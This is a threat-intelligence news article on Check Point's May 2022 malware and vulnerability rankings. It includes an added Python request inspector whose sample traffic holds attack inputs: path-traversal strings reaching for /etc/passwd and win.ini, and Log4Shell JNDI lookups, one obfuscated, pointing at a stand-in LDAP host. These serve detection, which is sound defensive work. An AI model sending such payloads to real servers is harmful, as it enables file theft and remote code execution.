Top Malware of May 2022
Emotet remains undisputed at the top of the Check Point Research table for May 2022, followed by Formbook and Qbot.
Check Point has published the Global Threat Index for May 2022.
Emotet remains at the top and affected 8.16 percent of all German companies and authorities tracked by Check Point, a slight decline compared to April. The infostealer Formbook is in second place and the banking Trojan Qbot in third.
Maya Horowitz, Director of Threat Intelligence and Research and Products at Check Point
Worldwide, on the other hand, the Snake keylogger is attracting attention. Maya Horowitz, VP Research at Check Point, warns:
“As the recent Snake keylogger campaigns show, users are exposed to the risk of a cyber attack in everything they do on the Internet. Viruses and malicious executable code can lurk in multimedia content and links, with the malware, in this case the Snake keylogger, ready to attack as soon as a user opens the malicious PDF file. Just as users would question the legitimacy of a docx or xlsx email attachment, they must therefore exercise the same caution with PDFs. It has never been more important for companies to have a robust email security solution that quarantines and checks attachments to prevent malicious files from entering the network in the first place.”
Top 3 Most Wanted Malware for Germany:
The arrows refer to the change in placement from the previous month.
Emotet is still in first place. Formbook takes second place and Qbot takes third place.
- ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. It was previously used as a banking Trojan, but currently serves as a distributor of other malware or entire campaigns. It uses various methods to stay operational and employs evasion techniques to avoid detection. It is spread through phishing emails that contain malicious attachments or links.
- ↑ Formbook – FormBook is an infostealer that targets the Windows operating system and was first discovered in 2016. It is marketed in hacking forums as Malware-as-a-Service (MaaS) because of its strong evasion techniques and relatively low price. FormBook collects and steals credentials from various web browsers, takes screenshots, monitors and logs keystrokes, and can download and run files from its C&C on instruction.
- ↑ Qbot – Qbot, also known as Qakbot, is a banking Trojan that first appeared in 2008. Qbot is often distributed via spam emails and uses various anti-VM, anti-debugging and anti-sandbox techniques to complicate analysis and bypass detection.
The Top 3 Most Wanted Vulnerabilities:
This month, the most exploited vulnerability is Web Server’s Malicious URL Directory Traversal, which affects 46 percent of companies worldwide, followed by Apache Log4j Remote Code Execution (CVE-2021-44228), which also affects 46 percent of companies worldwide. Web Server Exposed Git Repository Information Disclosure slips to third place with a worldwide impact of 45 percent.
- ↑ Web Servers Malicious URL Directory Traversal (CVE-2010-4598, CVE-2011-2474, CVE-2014-0130, CVE-2014-0780, CVE-2015-0666, CVE-2015-4068, CVE-2015-7254, CVE-2016-4523, CVE-2016-8530, CVE-2017-11512, CVE-2018-3948, CVE-2018-3949, CVE-2019-18952, CVE-2020-5410, CVE-2020-8260) – Various web servers contain a directory traversal vulnerability. It is caused by an input validation error: the web server does not properly sanitize the URL for directory traversal patterns (such as ../ sequences, including their percent-encoded forms). Successful exploitation allows attackers to read or access arbitrary files on the vulnerable server.
- ↔ Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. An attacker who can get a crafted string (a JNDI lookup such as ${jndi:ldap://...}) into a logged message can make the vulnerable application fetch and execute attacker-controlled code.
- ↓ Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported for Git repositories exposed on web servers. Successful exploitation could allow unintended disclosure of account information.
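To make the three vulnerability classes above concrete, here is an added Python example (not code from the article or from Check Point) that inspects HTTP request lines for each of them, in the way an IPS or WAF signature would. The sample requests, the header values and the 198.51.100.x addresses in them are constructed for this example, and the finding names are this example's own. Two details matter in practice: the inspector percent-decodes the request target repeatedly, because a filter that decodes once misses double-encoded ../ sequences, and it treats a nested ${...${...}} lookup as a Log4Shell indicator, since the plain ${jndi: string is routinely obfuscated.

```python
"""Request inspector for the top-3 exploited vulnerability classes.
Added example, not the article's or Check Point's code; every sample
request, header value and address below is constructed for illustration."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Traversal: a ".." segment at the start of the target, after a slash, or at the
# start of a query value, checked after decoding (covers ../, ..\, %2e%2e/, %252e%252e/).
TRAVERSAL = re.compile(r"(^|[/?=&])\.\.(/|$)")
# Exposed Git metadata: any request for a ".git" directory or a file beneath it.
GIT_DIR = re.compile(r"(^|/)\.git(/|$)")
# Log4Shell: a JNDI lookup, or a nested lookup used to obfuscate one, e.g. ${${lower:j}ndi:...}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing. Attackers double-encode to
    slip past filters that decode once; the round cap keeps this bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_target(raw_target: str) -> str:
    """Decode the full request target (path and query) and fold backslashes into
    slashes, because some servers accept ..\\ as a traversal step."""
    return decode(raw_target).replace("\\", "/")


def inspect_request(method: str, target: str, headers: Dict[str, str]) -> List[str]:
    """Return the sorted list of vulnerability classes a single request matches."""
    findings = set()
    norm = normalize_target(target)
    if TRAVERSAL.search(norm):
        findings.add("directory-traversal")
    if GIT_DIR.search(norm):
        findings.add("exposed-git-repository")
    # A Log4j lookup can arrive in any field the application logs: target or header.
    for field in [target, *headers.values()]:
        text = decode(field)
        if JNDI_LOOKUP.search(text) or NESTED_LOOKUP.search(text):
            findings.add("log4j-jndi-lookup")
    return sorted(findings)


# Constructed sample traffic (documentation-range addresses, not real targets).
SAMPLE_REQUESTS: List[Tuple[str, str, Dict[str, str]]] = [
    ("GET", "/index.html", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/static/../../etc/passwd", {}),
    ("GET", "/static/%252e%252e/%252e%252e/etc/passwd", {}),
    ("GET", "/download?file=..\\..\\windows\\win.ini", {}),
    ("GET", "/", {"User-Agent": "${jndi:ldap://198.51.100.7:1389/a}"}),
    ("GET", "/", {"X-Api-Version": "${${lower:j}ndi:ldap://198.51.100.7/x}"}),
    ("GET", "/.git/HEAD", {}),
    ("GET", "/repo/.git/config", {}),
]


def inspect_all(requests=SAMPLE_REQUESTS) -> List[Tuple[str, List[str]]]:
    """Pair each request target with its findings; clean requests get []."""
    return [(target, inspect_request(m, target, h)) for m, target, h in requests]


if __name__ == "__main__":
    for target, found in inspect_all():
        print(f"{target:45s} {', '.join(found) or 'clean'}")
```

Run it as a script to see which sample requests are flagged and why. Of the eight constructed requests only the first is clean; the double-encoded and backslash traversal variants are caught only because the target is decoded to a fixed point before matching.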
The Top 3 Most Wanted Mobile Malware:
This month nothing changes: AlienBot remains the most common mobile malware, followed by FluBot and xHelper.
- ↔ AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows an attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker gains access to the victims’ accounts and eventually takes complete control of their devices.
- ↔ FluBot – FluBot is an Android malware spread via phishing SMS messages (smishing) that usually impersonate logistics providers. As soon as the user taps the link in the message, they are redirected to download a fake application containing FluBot. Once installed, the malware has various capabilities for harvesting credentials and supporting the smishing operation itself, including uploading contact lists and sending SMS messages to other phone numbers.
- ↔ xHelper – A mobile malware observed since March 2019 that is used to download other malicious apps and display advertisements. The application is able to hide from the user and can even reinstall itself after it has been uninstalled.
Top 3 most attacked industries and sectors in Germany:
- ↑ Education/Research.
- ↓ Software Vendor.
- ↔ ISP/MSP.
Check Point’s Global Threat Impact Index and its ThreatCloud Map are based on Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat data collected by hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This database is enriched by AI-based engines and exclusive research data from Check Point Research, the Intelligence & Research department of Check Point Software Technologies.